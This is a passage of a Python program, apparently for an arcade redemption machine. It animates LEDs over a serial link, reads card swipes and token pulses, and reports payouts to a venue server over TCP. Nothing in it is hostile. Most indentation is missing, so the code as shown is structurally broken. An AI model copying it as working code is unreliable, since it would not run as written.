verde2.append(0x00)
verde2.append(0x00)
verde2.append(0x00)
verde2.append(0x00)
verde2.append(0x00)
verde3=bytearray()
verde3.append(0x24)
verde3.append(0x00)
verde3.append(0x40)
verde3.append(0x00)
verde3.append(0x00)
verde3.append(0x00)
verde3.append(0x00)
verde4=bytearray()
verde4.append(0x24)
verde4.append(0x00)
verde4.append(0x08)
verde4.append(0x00)
verde4.append(0x00)
verde4.append(0x00)
verde4.append(0x00)
verde5=bytearray()
verde5.append(0x24)
verde5.append(0x00)
verde5.append(0x01)
verde5.append(0x00)
verde5.append(0x00)
verde5.append(0x00)
verde5.append(0x00)
verde6=bytearray()
verde6.append(0x24)
verde6.append(0x00)
verde6.append(0x00)
verde6.append(0x20)
verde6.append(0x00)
verde6.append(0x00)
verde6.append(0x00)
verde7=bytearray()
verde7.append(0x24)
verde7.append(0x00)
verde7.append(0x00)
verde7.append(0x04)
verde7.append(0x00)
verde7.append(0x00)
verde7.append(0x00)
verde8=bytearray()
verde8.append(0x24)
verde8.append(0x00)
verde8.append(0x00)
verde8.append(0x00)
verde8.append(0x80)
verde8.append(0x00)
verde8.append(0x00)
verde9=bytearray()
verde9.append(0x24)
verde9.append(0x00)
verde9.append(0x00)
verde9.append(0x00)
verde9.append(0x10)
verde9.append(0x00)
verde9.append(0x00)
verde10=bytearray()
verde10.append(0x24)
verde10.append(0x00)
verde10.append(0x00)
verde10.append(0x00)
verde10.append(0x02)
verde10.append(0x00)
verde10.append(0x00)
verde11=bytearray()
verde11.append(0x24)
verde11.append(0x00)
verde11.append(0x40)
verde11.append(0x00)
verde11.append(0x00)
verde11.append(0x40)
verde11.append(0x00)
ee=bytearray()
ee.append(0x24)
ee.append(0x00)
ee.append(0x00)
ee.append(0x00)
ee.append(0x00)
ee.append(0x00)
ee.append(0x00)
serie.write(ee)
time.sleep(1)
#serie.write(activot)
#time.sleep(.300)
cargo()
def tipo4():
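    # Test pattern: chases a single lit LED across every position, one 7-byte
    # 0x24 frame every 80 ms.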
if True:
serie.write(bytearray([0x24,0x01,0x00,0x00,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x10,0x00,0x00,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x11,0x00,0x00,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x01,0x00,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x10,0x00,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x11,0x00,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x01,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x10,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x11,0x00,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x01,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x10,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x11,0x00,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x00,0x01,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x00,0x10,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x00,0x11,0x00]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x00,0x00,0x01]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x00,0x00,0x10]))
time.sleep(00.080)
serie.write(bytearray([0x24,0x00,0x00,0x00,0x00,0x00,0x11]))
time.sleep(00.080)
def tipo3():
if True:
serie.write(bytearray([0x24,0x01,0x00,0x10,0x00,0x00,0x01]))
time.sleep(00.100)
serie.write(bytearray([0x24,0x00,0x10,0x00,0x01,0x00,0x10]))
time.sleep(00.100)
serie.write(bytearray([0x24,0x01,0x00,0x10,0x00,0x00,0x01]))
time.sleep(00.100)
serie.write(bytearray([0x24,0x00,0x10,0x00,0x01,0x00,0x10]))
time.sleep(00.100)
serie.write(bytearray([0x24,0x01,0x00,0x10,0x00,0x00,0x01]))
time.sleep(00.100)
serie.write(bytearray([0x24,0x00,0x10,0x00,0x01,0x00,0x10]))
time.sleep(00.100)
serie.write(bytearray([0x24,0x01,0x00,0x10,0x00,0x00,0x01]))
time.sleep(00.100)
serie.write(bytearray([0x24,0x00,0x10,0x00,0x01,0x00,0x10]))
time.sleep(00.100)
def tipo2():
if True:
serie.write(verde)
time.sleep(00.070)
serie.write(verde11)
time.sleep(00.070)
#serie.write(verde)
#time.sleep(00.070)
#serie.write(verde11)
#time.sleep(00.070)
#serie.write(verde)
#time.sleep(00.070)
#serie.write(verde11)
#time.sleep(00.070)
#serie.write(verde)
#time.sleep(00.070)
#serie.write(verde11)
#time.sleep(00.070)
def tipo1():
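    # Green sweep animation: steps through verde..verde11 and back, one frame
    # every 70 ms.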
if True:
##confirmacion=False
serie.write(verde)
#while confirmacion==False:
#obtengoOk()
####print(confirmacion)
time.sleep(00.070)
serie.write(verde1)
time.sleep(00.070)
serie.write(verde2)
time.sleep(00.070)
serie.write(verde3)
time.sleep(00.070)
serie.write(verde4)
time.sleep(00.070)
serie.write(verde5)
time.sleep(00.070)
serie.write(verde6)
time.sleep(00.070)
serie.write(verde7)
time.sleep(00.070)
serie.write(verde8)
time.sleep(00.070)
serie.write(verde9)
time.sleep(00.070)
serie.write(verde10)
time.sleep(00.070)
serie.write(verde11)
time.sleep(00.070)
serie.write(verde11)
time.sleep(00.070)
serie.write(verde10)
time.sleep(00.070)
serie.write(verde9)
time.sleep(00.070)
serie.write(verde8)
time.sleep(00.070)
serie.write(verde7)
time.sleep(00.070)
serie.write(verde6)
time.sleep(00.070)
serie.write(verde5)
time.sleep(00.070)
serie.write(verde4)
time.sleep(00.070)
serie.write(verde3)
time.sleep(00.070)
serie.write(verde2)
time.sleep(00.070)
serie.write(verde1)
time.sleep(00.070)
serie.write(verde)
time.sleep(00.070)
dato = serie.readline(15)
#if dato.decode('utf-8')=='U':
# confirmacion=True
#if len(dato.decode('utf-8'))>14:
###print(dato.decode('utf-8'))
def GiroIndividual(aa,bb,cc,direccion):
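    # Builds one rotating-LED frame: an 8-bit opcode (0x24) followed by 48
    # colour bits (16 LEDs x 3 channels). aa/bb/cc pick the lit bit in each
    # channel; on later calls (xa != 0) the lit bits advance by 3, i.e. one
    # LED. direccion 'd' appends the bits (one rotation sense); anything
    # else prepends them (the opposite sense).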
global confirmacion
global ctk
global tarjeta
global lcolor1
global lcolor2
global lcolor3
a=""
if True:
a24='00100100'
#color='000000000000000000000000000000000000000000000000'
xx=0
if xa==0:
lcolor1=aa
lcolor2=bb
lcolor3=cc
else:
lcolor1=lcolor1+3
lcolor2=lcolor2+3
lcolor3=lcolor3+3
color=''
##confirmacion=False
if xa<16:
####print(xa)
while xx< 48:
if xx==(lcolor1)-1:
if direccion=='d':
color=color+'1'
else:
color='1'+color
else:
if direccion=='d':
color=color+'0'
else:
color='0'+color
if xx==(lcolor2)-1:
if direccion=='d':
color=color+'1'
else:
color='1'+color
else:
if direccion=='d':
color=color+'0'
else:
color='0'+color
if xx==(lcolor3)-1:
if direccion=='d':
color=color+'1'
else:
color='1'+color
else:
if direccion=='d':
color=color+'0'
else:
color='0'+color
xx=xx+3
#color=color+lcolor1+lcolor2+lcolor3
###print(color)
envio=a24+color
a=hex(int(envio,2))
a=bytearray.fromhex(a[2:16])
####print(a)
if confirmacion==True:
#confirmacion=False
#serie.flushInput()
serie.write(bytes(a))
#else:
#break
#if lenn(tarjeta)>0:
# time.sleep(00.100)
# return
#while confirmacion==False:
#
# color=''
#llego=serie.read(1).decode('utf-8')
#serie.flushInput()
####print(llego)
#if llego=='U':
#confirmacion
# llego=''
# confirmacion=True
#if len(llego)>14:
#reciboTarjeta
# p=llego.find(';',0)
# h=15+p
# if p>=0:
# ctk=0
# ###print(llego[p:h])
# confirmacion=True
# llego=''
#if llego=='@':
# llego=''
# ctk=ctk+1
# ###print(ctk)
# confirmacion=True
#if len(llego)>0 and confirmacion==False:
#llego=serie.readline(15).decode('utf-8')
#serie.flushInput()
# #confirmacion=False
# tarjeta=tarjeta+llego
# llego=''
# ###print(tarjeta)
# if len(tarjeta)>14:
# ###print(tarjeta)
#tarjeta=''
# confirmacion=True
#time.sleep(00.060)
#color=''
#xx=0
#lcolor1=lcolor1+3
#lcolor2=lcolor2+3
#lcolor3=lcolor3+3
####print(lcolor1)
confirmacion=True
###print('entre')
#GiroIndividual(aa,bb,cc,direccion)
#---------------------------------------
#---------------------------------------
def GiroEspecial(cc,c1,c2,c3,c4,c5,c6,c7,c8,c9,c10,c11,c12,c13,c14,c15,c16,d):
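    # Sends one LED frame from explicit data: cc selects the opcode ('24',
    # '25' or '28') and c1..c16 are the sixteen 3-bit LED colour groups,
    # concatenated into the 48 colour bits.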
global confirmacion
if True:
if cc=='24':
a24='00100100'
if cc=='25':
a24='00100101'
if cc=='28':
a24='00101000'
#color='000000000000000000000000000000000000000000000000'
xx=0
#If d=='d':
color=c1+c2+c3+c4+c5+c6+c7+c8+c9+c10+c11+c12+c13+c14+c15+c16
#else:
# color=c16+c15+c14+c13+c12+c11+c10+c9+c8+c7+c6+c5+c4+c3+c2+c1
###print(color)
envio=a24+color
a=hex(int(envio,2))
a=bytearray.fromhex(a[2:16])
####print(a)
if confirmacion==True:
#confirmacion=False
serie.write(bytes(a))
#confirmacion=True
#----------------------------------------
def GiroPared(aa,bb,cc,direccion,cual):
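    # Like GiroIndividual, but only rotates within the first `cual`
    # quarter(s) of the strip (12/24/36/48 bits); the remaining bits are
    # zero-padded.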
global confirmacion
global ctk
global tarjeta
global lcolor1
global lcolor2
global lcolor3
color=''
a=""
if True:
a24='00100100'
#color='000000000000000000000000000000000000000000000000'
xx=0
if cual==1:
cual=12
if cual==2:
cual=24
if cual==3:
cual=36
if cual==4:
cual=48
#if xa==0:
lcolor1=aa
lcolor2=bb
lcolor3=cc
#else:
# lcolor1=lcolor1+3
# lcolor2=lcolor2+3
# lcolor3=lcolor3+3
color=''
##confirmacion=False
if True:
####print(xa)
while xx< cual:
if xx==(lcolor1)-1:
color=color+'1'
else:
color=color+'0'
if xx==(lcolor2)-1:
color=color+'1'
else:
color=color+'0'
if xx==(lcolor3)-1:
color=color+'1'
else:
color=color+'0'
xx=xx+3
lcolor1=lcolor1+3
lcolor2=lcolor2+3
lcolor3=lcolor3+3
if cual==12:
e=0
while e<36:
color=color+'0'
e=e+1
if cual==24:
e=0
while e<24:
color=color+'0'
e=e+1
if cual==36:
e=0
while e<12:
color=color+'0'
e=e+1
###print(color)
envio=a24+color
a=hex(int(envio,2))
a=bytearray.fromhex(a[2:16])
if confirmacion==True:
#confirmacion=False
serie.write(bytes(a))
confirmacion=True
#----------------------------------------
def ColorFijo(b,r,g):
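    # Builds a static frame lighting every LED whose channel offset matches
    # b/r/g, then hands the 7-byte frame to the sender thread via
    # EnvioPuerto.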
#global confirmacion
global ctk
global tarjeta
global EnvioPuerto
a=""
if True:
        a24='00100100' # ends in 00 = opcode 0x24 / 01 = 0x25
color='000000000000000000000000000000000000000000000000'
xx=0
lcolor1=b
lcolor2=r
lcolor3=g
color=''
xa=0
while xx<48:
####print(xa)
if xx==(lcolor1)-1:
color=color+'1'
else:
color=color+'0'
if xx==(lcolor2)-1:
color=color+'1'
else:
color=color+'0'
if xx==(lcolor3)-1:
color=color+'1'
else:
color=color+'0'
xx=xx+3
lcolor1=lcolor1+3
lcolor2=lcolor2+3
lcolor3=lcolor3+3
envio=''
a=''
envio=str(a24) + str(color)
##print(len(color))
#print (len(a24))
##print(len(envio))
        #Works: option 1
        a=hex(int(envio,2))
        a=bytearray.fromhex(a[2:16])
        #Works: option 2
        #a=bytearray([int(envio[i:i+8],2)for i in range(0,len(envio),8)])
        #a=int(envio,2).to_bytes(8,'big')
##print(a)
#if confirmacion==True:
#if PagandoTk==False:
##confirmacion=False
#serie.flushInput()
#serie.write(bytes(a))
#while len(EnvioPuerto)>0:
# a=1
while EnvioPuerto!='':
b=1
#time.sleep(.050)
##print("envia luz colorfijo")
EnvioPuerto=a#bytearray([0x28,0x10,0x10,0x10,0x10,0x10,0x01])#bytes(a)
#while EnvioPuerto!='':
# b=1
def luz2017(cual):
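    # Queues a named LED state on EnvioPuerto: 'paseo'/'paseo2' idle
    # animations, 'verde'/'rojo' solid colours, 'pagando'/'pagoblanco'/
    # 'terminopago' payout states, 'apagado' all off.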
global EnvioPuerto
global punto
global apb
global controlluces
global ConfirmacionTarjeta
if apb=='':
apb=0
if cual=='paseo2':
while EnvioPuerto!='' :
b=1
if punto==0: #and tarjeta=='':
###print("yo1")
#EnvioPuerto=bytearray([0x25,0x11,0x11,0x11,0x11,0x11,0x11])#bytes(a)
EnvioPuerto=ColorRojo#ColorRojo#bytearray([0x25,0xFF,0xFF,0xFF,0xFF,0xFF,0xF8])#bytes(a)
if cual=='paseo':
#while EnvioPuerto!='':
# b=1
if controlluces==1 and EnvioPuerto=='' and punto==0 and tarjeta=='':#tarjeta=='' :#punto==0 and tarjeta=='' and ctk==0:
#print("yo2")
controlluces=0
EnvioPuerto=bytearray([0x25,0x09,0x00,0x09,0x00,0x49,0xF8])#bytearray([0x28,0x10,0x11,0x01,0x02,0x05,0x09])#bytes(a)
time.sleep(0.9)
#controlluces=1
return
#time.sleep(1.5)
if cual=='verde':
while EnvioPuerto!='':
b=1
#punto=0
EnvioPuerto=ColorVerde
if cual=='pagoblanco':
while EnvioPuerto!='':
b=1
#punto=0
EnvioPuerto=bytearray([0x24,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF])
if cual=='pagando':
while EnvioPuerto!='':
b=1
#punto=0
EnvioPuerto=bytearray([0x25,0x92,0x49,0x24,0x92,0x49,0x27])
if cual=='terminopago':
while EnvioPuerto!='':
b=1
# punto=0
EnvioPuerto=ColorVerde
while EnvioPuerto!='':
b=1
serie.flush()
time.sleep(0.2)
ConfirmacionTarjeta=False
while ConfirmacionTarjeta==False:
serie.write(bytes(activot))
time.sleep(0.200)
#EnvioPuerto=activot
#while EnvioPuerto!='':
# b=1
#EnvioPuerto=bytearray([0x24,0x00,0x00,0x00,0x00,0x00,0x00])#bytes(a)
#while EnvioPuerto!='':
# b=1
if cual=='rojo':
while EnvioPuerto!='':
b=1
#punto=0
EnvioPuerto=ColorRojo
#while EnvioPue
if cual=='apagado':
while EnvioPuerto!='':
b=1
EnvioPuerto=bytearray([0x24,0x00,0x00,0x00,0x00,0x00,0x00])#bytes(a)
#while EnvioPuerto!='':
# b=1
def colorfijo2(p,c1,c2,c3,c4):
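    # Static frame variant: p selects the opcode and c1..c4 are 3-bit colour
    # patterns; the loop actually emits more bits than needed, and the
    # a[2:16] slice below keeps only the opcode plus the first 48 colour
    # bits, so the effective pattern is c1+c2+c3+c4 repeated four times.
    # Writes the frame directly instead of going through EnvioPuerto.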
global EnvioPuerto
#global confirmacion
global ctk
global tarjeta
#a=""
if True:
if p=='24':
a24='00100100'
if p=='25':
a24='00100101'
if p=='28':
a24='00101000'
        #a24='00101000' # ends in 00 = opcode 0x24 / 01 = 0x25
color='000000000000000000000000000000000000000000000000'
xx=0
color=''
xa=0
while xx<48:
####print(xa)
if xx<12:
color=color+c1
if xx<24:
color=color+c2
if xx<36:
color=color+c3
if xx<48:
color=color+c4
xx=xx+3
envio=a24+color
a=hex(int(envio,2))
a=bytearray.fromhex(a[2:16])
####print(a)
#if confirmacion==True:
# #confirmacion=False
serie.flush()
time.sleep(.050)
serie.write(bytes(a))
#while len(EnvioPuerto)>0:
# a=1
#EnvioPuerto=bytes(a)
#while EnvioPuerto!='':
# b=1
#time.sleep(.050)
##print("envia luz #colorfijo2")
#if punto==0:
# EnvioPuerto=a#bytes(a)
def mprueba():
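    # Idle-animation scheduler: steps jluces through the animation stages
    # (GiroEspecial sparkles, GiroPared, GiroIndividual, DosMundos) whenever
    # no card is being read and no payout is running.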
global xa
global jluces
#xa=0
if True:
###print(xa)
if confirmacion==True and PagandoTk==False and len(tarjeta)==0:
if jluces==0:
#GiroIndividual(1,1,1,'d')
#GiroPared(0,1,1,'d',1)
GiroEspecial('25',
'001',
'000',
'000',
'000',
'000',
'010',
'000',
'000',
'000',
'100',
'000',
'000',
'000',
'000',
'000',
'000','d')
xa=xa+1
if xa>=1:
xa=0
jluces=jluces+1
if confirmacion==True and PagandoTk==False and len(tarjeta)==0:
if jluces==1:
#GiroEspecial('25',
# '011',
# '011',
# '011',
# '011',
# '011',
# '011',
# '011',
# '011',
# '011',
# '010',
# '010',
# '100',
# '100',
# '001',
# '001',
# '011','d')
GiroPared(1,0,1,'i',4)
xa=xa+1
if xa>=8:
xa=0
jluces=jluces+1
if confirmacion==True and PagandoTk==False and len(tarjeta)==0:
if jluces==2:
GiroEspecial('25',
'001',
'000',
'000',
'000',
'000',
'010',
'000',
'000',
'000',
'000',
'100',
'000',
'000',
'000',
'000',
'000','d')
xa=xa+1
if xa>=1:
xa=0
jluces=jluces+1
if confirmacion==True and PagandoTk==False and len(tarjeta)==0:
if jluces==3:
GiroIndividual(0,0,1,'d')
xa=xa+1
if xa>=1:
xa=0
jluces=jluces+1
if confirmacion==True and PagandoTk==False:
if jluces==5:
GiroEspecial('25',
'010',
'010',
'000',
'000',
'100',
'100',
'000',
'000',
'010',
'010',
'000',
'000',
'000',
'000',
'000',
'000','d')
xa=xa+1
if xa>=1:
xa=0
jluces=jluces+1
if confirmacion==True and PagandoTk==False and len(tarjeta)==0:
if jluces==4:
#GiroIndividual(1,0,0,'i')
#colorfijo2('28','000','000','000','001')
xa=xa+1
if xa>=1:
xa=0
jluces=jluces+1
if confirmacion==True and PagandoTk==False and len(tarjeta)==0:
if jluces==6:
DosMundos()
xa=xa+1
if xa>=10:
xa=0
jluces=0
def EscuchoPuerto():
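    # Serial reader thread. Single-byte replies: 'Z' card-reader ack, 'Y'
    # coin ack, 'X' reader ready, 'V' re-enable idle lights, 'U' frame ack,
    # 'T' mute ack. '@' (electronic) and 'A' (physical) are token pulses
    # counted into ctk; ';' starts a card number, which is accumulated for
    # PuertoSerie() to parse.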
global acumulador
global PagandoTk
global ctk
global TimeOut
global confirmacion
global EntrarTimer
global HTimeOut
global SinNada
global apb
global tarjeta
global EnvioPuerto
global punto
global recibi
global luz
global controlluces
global tarjetalista
global ConfirmacionCoin
global ConfirmacionTarjeta
global confirmacionMudo
#global screen
tarjeta=''
EntrarTimer=False
doblev=''
apb=0
acumulador=''
recibi=''
luz='no'
while True:
try:
a=serie.read(1).decode('utf-8')
#serie.flushInput()
if len(a)>0:
#print(a)
recibi=recibi+a
if recibi.find('W',0)>-1:
doblev='W'
if TerminoOperacion==1:
acumulador=acumulador+a
#else:
# if controlluces==1:
# luz2017('paseo')
if a=='Z':
ConfirmacionTarjeta=True
if a=='Y':
ConfirmacionCoin=1
if a=='X':
tarjetalista=1
if a=='V':# and ctk==0:
controlluces=1
if a=='U':
confirmacion=True
if a=='T':
confirmacionMudo=True
print('Mudo Ok')
if recibi.find('U',0)>-1:
###print("confirmo")
confirmacion=True
#EnvioPuerto=''
if recibi.find('V',0)>-1 and ctk==0:
controlluces=1
if recibi.find('X',0)>-1:
tarjetalista=1
#return
if a==";" and tarjeta=='':
serie.flushOutput()
#controlluces=0
if punto==0:
#EnvioPuerto=''
#controlluces=1
#while EnvioPuerto!='':
b=1
#EnvioPuerto=desactivot
#while EnvioPuerto!='':
# b=1
#serie.flushOutput()
#EnvioPuerto=''
#serie.write(bytes(desactivot))
punto=1
ar=recibi.find('@',0)
if ar>-1 and UltTar!='':
if PagandoTk==False:
#if confirmacion==True:
EnvioPuerto=desactivot
#serie.write(desactivot)
EntrarTimer=False
PagandoTk=True
controlluces=0
TimeOut=False
esto=recibi
recibi=''
x=0
while x< len(esto):
esta=esto.find("@",x,x+1)
if esta>-1:
ctk=ctk+1
x=x+1
HTimeOut=datetime.now()+timedelta(seconds=4)
#colorfijo2('24','100','000','100','000')
#luz=1
#HTimeOut=datetime.now()+timedelta(seconds=3)
#noviembre2017
recibi=''
#acumulador=''
HTimeOut=datetime.now()+timedelta(seconds=3)
#if confirmacion==True:
# colorfijo2('25','100','000','100','000')
PagandoTk=False
#break
###print(ctk)
                #----- FOR PHYSICAL (COIN) PAYOUT ---
ar=recibi.find('A',0)
if ar>-1 and UltTar!='':
if PagandoTk==False:
#if confirmacion==True:
EnvioPuerto=desactivot
#serie.write(desactivot)
EntrarTimer=False
PagandoTk=True
controlluces=0
TimeOut=False
esto=recibi
recibi=''
x=0
while x< len(esto):
esta=esto.find("A",x,x+1)
if esta>-1:
ctk=ctk+1
x=x+1
HTimeOut=datetime.now()+timedelta(seconds=4)
#colorfijo2('24','100','000','100','000')
#luz=1
#HTimeOut=datetime.now()+timedelta(seconds=3)
#noviembre2017
recibi=''
#acumulador=''
HTimeOut=datetime.now()+timedelta(seconds=3)
#if confirmacion==True:
# colorfijo2('25','100','000','100','000')
PagandoTk=False
#break
###print(ctk)
recibi=''
#if confirmacion==True and controlluces==0 and punto==0 and ctk==0:
# controlluces=1
#if controlluces==0:
# MiLuz()
except:
print("murio serie")
serie = serial.Serial('/dev/serial0', 9600, timeout=0.2, writeTimeout=0)
continue
def PuertoSerie():
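    # Consumer thread for the bytes collected by EscuchoPuerto(): extracts
    # 15-character card numbers (';' plus 14 characters), finalises token
    # payouts once the watchdog flags TimeOut, and shows the "invalid card"
    # screen when the board reports 'W'.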
global acumulador
global PagandoTk
global ctk
global TimeOut
global confirmacion
global EntrarTimer
global HTimeOut
global SinNada
global apb
global tarjeta
global EnvioPuerto
global UltTar
global controlluces
global TerminoOperacion
global ConfirmacionTarjeta
#global screen
tarjeta=''
EntrarTimer=False
apb=0
#acumulador=''
while True:
a=''
doblev=''
if len(acumulador)>0: #len(a)==0 and
pp=acumulador.find('?',0)
if pp>0:#and controlluces==0:
serie.flush()
EnvioPuerto=''
p=acumulador.find(';',0)
h=p+15
#[p:h]
mtar=acumulador[p:h]
print(mtar)
if len(mtar)>=15 and TerminoOperacion==1:# and controlluces==0:
print("entra tarjeta" + str(mtar))
acumulador=''
#MuestraTarjeta(mtar)
controlluces=0
tarjeta=mtar
else:
#TerminoOperacion=0
print("NO entra tarjeta")
if len(mtar)>=15:
acumulador=''
if acumulador=='' and PagandoTk==True :
PagandoTk=False
b=1
if PagandoTk==False and int(ctk)>0 and TimeOut==True:
FinalizoTks()
#ctk=0
if ctk==0:
TerminoPago()
if acumulador.find('W',0)>-1:
print('W')
acumulador=''
doblev='w'
if tarjeta=='' and TerminoOperacion==1 and controlluces==1:
#while EnvioPuerto!='':
# time.sleep(0.001)
#controlluces=0
myfont =pygame.font.Font("super.ttf",35)
bg = pygame.image.load("fondot.jpg")
screen.blit(bg,(0,0))
if LabelPase=='Pase Su Tarjeta':
TIT='TARJETA INVALIDA'
esto="Pase nuevamente su tarjeta"
else:
TIT='INVALID CARD'
esto="Slide your card again"
label = myfont.render(TIT, 1, (0,255,20))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-40))
myfont =pygame.font.Font("super.ttf",25)
label1 = myfont.render(esto, 1, (0,255,20))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+40))
pygame.display.flip()
pygame.display.update()
time.sleep(.100)
serie.flush()
serie.write(bytes(bytearray([0x25,0x49,0x00,0x00,0x49,0x00,0x00])))
time.sleep(1.0)
serie.flush()
#time.sleep(0.030)
#confirmacion=False
#serie.write(bytes(activot))
#while confirmacion==False:
# b=1
serie.flush()
time.sleep(0.100)
ConfirmacionTarjeta=False
while ConfirmacionTarjeta==False:
serie.write(bytes(activot))
time.sleep(0.100)
#controlluces=1
#doblev=''
#acumulador=''
PantFull()
#tarjetalista=1
else:
#if tarjeta=='':# and controlluces==1:
serie.flush()
time.sleep(0.500)
ConfirmacionTarjeta=False
#serie.write(bytes(activot))
while ConfirmacionTarjeta==False:
serie.write(bytes(activot))
time.sleep(0.100)
#controlluces=1
#doblev=''
#acumulador=''
#tarjetalista=1
if controlluces==1:# or doblev=='w':# and tarjeta=='' and ctk==0:# and acumulador.find('W',0)==0:
#serie.flush()
#confirmacion=False
#print('mando luz')
luz2017('paseo')
#while confirmacion==False:
# b=1
#confirmacion=False
#serie.flush()
#serie.write(bytes(activot))
#while confirmacion==False:
# b=1
def Pantalla():
    # the visual event loop lives here
#pygame.display.update()
while True:
#totalpagar=ctk
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.mouse.set_visible(1)
os.system('setterm -cursor on')
pygame.quit()
quit()
sys.exit()
break
elif event.type == pygame.KEYDOWN:
###print(event.key)
if event.key == 27:
pygame.mouse.set_visible(1)
os.system('setterm -cursor on')
pygame.quit()
sys.exit()
quit()
break
#------ PYGAME------
# #screen.fill((0,0,0))
# #pygame.display.flip()
# #---------------------------------------------
def TerminoPago():
global EnvioPuerto
global controlluces
global ConfirmacionTarjeta
while EnvioPuerto!='':
b=1
ConfirmacionTarjeta=False
while ConfirmacionTarjeta==False:
serie.write(bytes(activot))
time.sleep(0.200)
#EnvioPuerto=
PantFull()
#EnvioPuerto=activot
controlluces=1
#confirmacion=True
def PagoTks():
global HTimeOut
#HTimeOut=datetime.now()+timedelta(seconds=3)
#TSaldo.config(text="Paying E-Tks",fg="blue")
#Saldo.config(text=ctk,fg="green")
#TVip.config(text="")
#Vip.config(text="")
HTimeOut=datetime.now()+timedelta(seconds=3)
def FinalizoTks():
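    # Reports the accumulated token count to the venue server over TCP
    # (MAC,IP,machine#card + zero-padded hex token count), shows the payout
    # screen, then resets the counters and redraws the idle screen.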
global ctk
global PagandoTk
global TimeOut
global ultctk
global EnvioPuerto
global PantallaPago
while EnvioPuerto!='':
b=1
    EnvioPuerto=bytearray([0x30,0x01,0x27])# 3rd byte selects physical or electronic payout: 35 is electronic and 60 is physical
if ctk>0 and UltTar!='':
try:
# Create a TCP/IP socket
PantallaPago=1
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect the socket to the port where the server is listening
server_address = (str(IP),5000)#192.168.2.50 -- IAAPA
##print('connecting to %s port %s' % server_address)
sock.settimeout(3.25)
sock.connect(server_address)
# Send data #P'+UltTar[:-1]+{0:4}.format(str(ctk))#NumMaq + tarjeta #tarjeta.get() #'C;1921000005618'
ttk2018=str(hex(ctk)[2:]).upper()
message = MiMac+','+MiIp+','+NumMaq+'#'+UltTar[:-1] + str(ttk2018).zfill(4) +'99'#NumMaq + tarjeta #tarjeta.get() #'C;1921000005618'#'0055#;47900089307660002F4'
#print('sending "%s"' % message)#'{0:04}'.format(str(ctk))
#print('{0:04}'.format(str(ctk)))
sock.settimeout(1.25)
sock.sendall(message.encode(encoding='UTF-8',errors='ignore'))
# Look for the response
amount_received = 0
amount_expected = 1#len(message)
data=''
yat=datetime.now()
hastat=datetime.now()+timedelta(milliseconds=2000)
#amount_received < amount_expected and
while hastat > yat and data=='':
data = sock.recv(48)
#print(data)
if data:
#ctk=0
message='103'
sock.sendall(message.encode(encoding='UTF-8',errors='ignore'))
except:
##print('error al conectar')
b=1
finally:
#tarjeta=''
#punto=0
#haytarjeta=0
##print('closing socket')
sock.close()
screen.fill((0,0,0))
bg = pygame.image.load("fondo.jpg")
screen.blit(bg,(0,0))
#myfont = pygame.font.SysFont("monospace", 45)
myfont =pygame.font.Font("super.ttf",45)
#label = myfont.render("YOU WIN "+ str(ctk) + " Tks!", 1, (0,180,0))
label = myfont.render(LabelPago, 1, (0,255,23))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-40))
myfont =pygame.font.Font("super.ttf",70)
label1 = myfont.render(str(ctk), 1, (0,255,20))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+40))
pygame.display.flip()
pygame.display.update()
ultctk=0
ctk=0
PagandoTk=False
TimeOut=False
colorfijo2('28','000','000','100','100')
## while EnvioPuerto!='':
## b=1
## EnvioPuerto=bytearray([0x30,0x01,0x35])
time.sleep(2)
#ctk=0
while EnvioPuerto!='':
b=1
EnvioPuerto=bytearray([0x30,0x01,0x27])
PantFull()
PantallaPago=0
def MuestroPagoTk():
global contador
global totalpagar
global ctk
global apb
global confirmacion
global luz
global controlluces
contador=0
totalpagar=0
luz=0
apb=1
global ultctk
#pygame.mixer.music.load("/home/pi/Desktop/etk.mp3")
#while pygame.mixer.music.get_busy() == True:
# continue
    ultctk=0
    while True:
        if ctk>0 and TimeOut==False and UltTar!='' and PantallaPago==0: # and ctk>ultctk:
            if ultctk==0:
                controlluces=1
            ultctk=ctk
#pygame.mixer.music.play()
#time.sleep(1)
#screen.fill(white)
#if ctk<5:
screen.fill((0,0,0))
bg = pygame.image.load("fraspitk.jpg")
screen.blit(bg,(0,0))
#myfont = pygame.font.SysFont("monospace", 55)
myfont =pygame.font.Font("super.ttf",42)
label = myfont.render(LabelPagando, 1, (255,255,255))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2),70))
#myfont = pygame.font.SysFont("monospace", 90)
myfont =pygame.font.Font("super.ttf",95)
esto= str(ctk)
label1 = myfont.render(esto, 1, (0,255,20))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label1.get_height()) / 2)+55))#(label, (((infoObject.current_w - label.get_width()) / 2),160 ))
pygame.display.flip()
pygame.display.update()
controlluces=0
if apb==1 :#and controlluces == 1:
